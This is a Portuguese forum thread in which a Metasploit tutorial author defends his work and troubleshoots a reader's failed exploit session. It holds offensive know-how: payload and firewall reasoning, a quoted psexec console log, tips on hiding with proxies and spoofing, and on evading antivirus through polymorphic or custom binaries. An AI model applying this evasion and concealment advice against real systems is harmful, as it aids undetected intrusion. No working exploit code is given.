porque acrescentar um comentário desses a um trabalho tão esforçado e que nada teve a ver com "CÓPIAS", mas QUE OBVIAMENTE TENDO EM CONTA QUE HÁ MAIS PESSOAS A FALAR DO MESMO; ALGUMAS COISAS SEJAM IDÊNTICAS... ISSO SÓ MOSTRA QUE ESTAMOS CORRECTOS... se fosse diferente era porque eu tinha errado.

Não vejo onde é que a diferença significa que se está errado. Cada pessoa sua perspectiva, e seu conhecimento sobre a língua. É normal que sobre o mesmo assunto se fale de maneira ligeiramente diferente, com um toque pessoal. Apenas disse que os tutoriais tinham semelhanças, não disse que eram cópias, e se usaste alguma informação da net pra melhorar este tutorial, não há nada de mal nisso. Mais uma vez, encontrei aquele tutorial porque o que tu escreveste me fez procurar mais sobre o assunto, de modo a tentar perceber alguma coisa. Se o teu alvo eram pessoas que já conhecem os processos envolvidos pelo metasploit, peço desculpa, pensei que fosse para toda a gente.

Não entendo porque escreves capitalizado.

deve ser uma geração especial que nasceu ensinada e não ouve ninguém e sabe tudo... mas estão a ser bem castigados, pois estão a herdar um pais em banca rota... mas isso é outra história... desemprego nos jovens é assustador... mas não querem ouvir nada de ninguém pois já sabem tudo (palavras do yoda)

Não me recordo de ter dito isso.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Não me recordo de ter dito isso.

poix...mas disseste... ou numa PM ou num post sobre um tema politico... mas não interessa... a mim só interessa quem quer aprender

e sobre as diferenças... mostra claramente que não sabes do que falas... os procedimentos de configurar e aplicar um exploit são sempre com os mesmos comandos e configurações...

até a forma de introduzir alguém ao MSFCLI é igual... começa pelo help/show.... ver os exploits e payloads... ver um alvo e depois de configurar os dados que são sempre os mesmos e aplicar o comando "exploit"

mas mostrei tanta coisa mais... alias, mostrei um circuito completo para se ficar com controlo total da maquina mais as passwords de alguns users dessa rede... e num post a seguir, que era para ser acrescentado a este tutorial mostrei como manter o acesso para sempre, mesmo que a vulnerabilidade seja corrigida.. e muito mais... não há local em PT com mais info sobre o metasploit

enfim... eu sei o que se passa e é por haver quem se mantenha a me motivar pessoalmente que eu ainda posto, porque uns não devem perder por outros... há quem queira e tenha já aprendido

PARABÉNS A ESSES, MESMO AQUELES QUE... mas sempre, sempre cuidado e atenção e não confiar em nada nem em ninguém

e sempre como um NINJA... invisível (proxyes e spoofing) :smoke: :ipool:  nada de exibicionismos

e obrigado aos que me tem apoiado... são vocês que me dão força... e vocês merecem  :D:confused:

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

@herakty, sem dúvida, tens material de excelente conteúdo. Não quis *nunca*, de maneira alguma, estragar o teu trabalho, o teu esforço ou a tua dedicação, no entanto, acabaste por não responder à minha questão/problema que tive com o metasploit que foi: quando consigo executar o exploit com sucesso retorna-me isto: "Exploit completed but no session was created", acho que este é um problema técnico. Atenção, isto foi tudo uma experiência com uma máquina velha que tinha aqui para o armário. Podias-me dar mais informações sobre esta questão e como resolvê-la, se já te aconteceu é claro.

Já agora, obrigado por todo o material que tens postado, não sou um grande aficionado na área de segurança mas tenho visto alguns posts e gostei, parabéns por este e pelos outros tutoriais. :thumbsup:

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
"Exploit completed but no session was created",

pensava que tinhas perguntado se o metasploit funcionava à distancia e respondi a isso... mas ok vou responder a esta nova

o que se passou é que o exploit foi enviado mas não conseguir fazer a ligação ao cliente (msfcli) que é de o programa de onde correste o exploit.

pode ser por várias coisas... o exploit mal configurado, o alvo mal configurado e pode ser várias coisas como seleccionares mal o SO ou programa alvo... os exploits só funcionam com determinadas versões de determinados SO´s ou programas.. alguns exploits exigem até a selecção de um SO com uma língua especifica. Por exemplo, teres de seleccionar um SO WinXP em Português, ou estás a enviar um exploit para uma versão diferente ou até SO (ou programa diferente)

os parâmetros obrigatórios foram preenchidos, mas com dados errados... uma das situações possíveis

outra pode ser uma firewall... por exemplo se usares este payload "windows/meterpreter/bind_tcp" e  houver uma firewall no meio não vai ser possível a comunicação e a criação de uma sessão, pois em vez da ligação ser iniciada de dentro da rede como no payload "reverse_tcp_bind", a ligação vai ser iniciada da tua maquina e a firewall corta a ligação

ou até podes ter tudo bem e até usar o reverse_tcp_bind mas estares a usar uma porta que a firewall não permite ligações nem de dentro...

resumindo... apesar de aparentemente estar o exploit com todos os dados configurados, estes não estão bem escolhidos em realação ao alvo e à rede...

é preciso começar-se pelas bases e não começar-se logo a tentar exploitar sem se perceber os mecanismos do TCP/IP e da segurança em geral

uma vez vi uma pessoa com um alvo vulnerável e tudo ok mas estava a escolher uma porta local para a qual a firewall não permitia ligações de dentro da rede onde estava o alvo... e isso dá exactamente esse erro

como ser mal escolhido o tipo de alvo ou payload

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Obrigado pela resposta. :cheesygrin:

e olha....soube agora de outra coisa na mailinglist do metasploit que pode estar relacionado com o que falaste, pois a mensagem de retorno é a mesma.... se quiseres aprender mais assina essa lista... e começa por baixo.. pela documentação base e vai avançando... não tenhas pressa e nunca querias provar nada a ninguém

Mailing list:

http://spool.metasploit.com/mailman/listinfo/framework

aprende pelo prazer de saberes... apenas isso... saberes que podes fazer coisas que mts poucos conseguem... é isto.. :)

mas o que queria dizer era: o meta é tão brutal que usa um esquema, já usado pelos vírus mutantes, algo que eu demonstro aqui neste tópico, chamado vírus mutantes... escapar aos AntiVirus e todos os  mecanismos de defesa com base em assinaturas... a técnica é gerar payloads dinâmicos e que mudam a assinatura.

Vírus Mutantes e suas técnicas

http://www.portugal-a-programar.pt/index.php?showtopic=2755

mas o que te queria dizer localhost é que suspeita-se que os fabricantes de AV´s estão a usar técnicas para detectar isto... foi hoje anunciada na lista que falei que já foi identificado um caso desses com o Symantec Endpoint Protection v.11.0.5xxx.xxx

e como podes ver o resultado foi igual ao teu... e como podes ver essa situação pode significar mt coisa, pois o que diz é que houve um exploitation com sucesso mas por algum motivo (há vários como já falei e este é mais um deles)

já se falou em melhorar essa mensagem de retorno para se perceber melhor o que aconteu... mas para já é assim e é a que te foi apresentada.

Exploit completed, but no session was created.

vou transcrever aqui o que foi apresentado nessa lista integralmente. não fui eu que detectei nem fui o autor do texto.

Hello,

I can confirm that the most recent windows/smb/psexec exploit gets detected by Symantec Endpoint Protection. It seems that Symantec isn't detecting the msf-generated executable, which is well randomized. Maybe the psexec exploitation process is heuristically easy to detect? I'm really not sure what could be setting it off, but I am a big fan of the psexec exploit and I would hate to see it lose it's "excellent" rating...

Here's a log of the detection, on the console side:

[*] Closing service handle...

[*] Opening service...

[*] Starting the service...

[*] Removing the service...

[*] Closing service handle...

[*] Deleting \aXecRCwF.exe...

[*] Exploit completed, but no session was created.

On the victim side, it pops up an AV warning for "Backdoor.Trojan" or something like that, with the executable's random filename. We're using Symantec Endpoint Protection v.11.0.5xxx.xxx and it's at r25 right now. Depending on endpoint protection for network security is really weak, but this detection could ruin my chances of convincing anyone to that end! I can provide a working copy of our Symantec setup if it would be helpful. Any help would be greatly appreciated!

a resposta de HDMoore, fundador e considerado um dos melhores especialistas de segurança do planeta. para mim o meta é a melhor coisa já feita no mundo da segurança... o nmap também é algo que me conquista o coração, mas o meta passou-o

This is the VT link for the service executable (service.exe) used for

psexec. It doesn't show Symantec' AV flagging it, so this may be

something specific to the Endpoint Protection product:

http://www.virustotal.com/analisis/dd8f7ce4bd7b56ebf5fc33c5e4791b89ecc9b4651a81ed6f898ce57d656360a3-1273885632

As long as we make our binaries public, the AV folks will continue to

signature them. You can try using the nmap script and see whether its

heuristics or static sigs, but your best bet is creating your own

replacement.

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora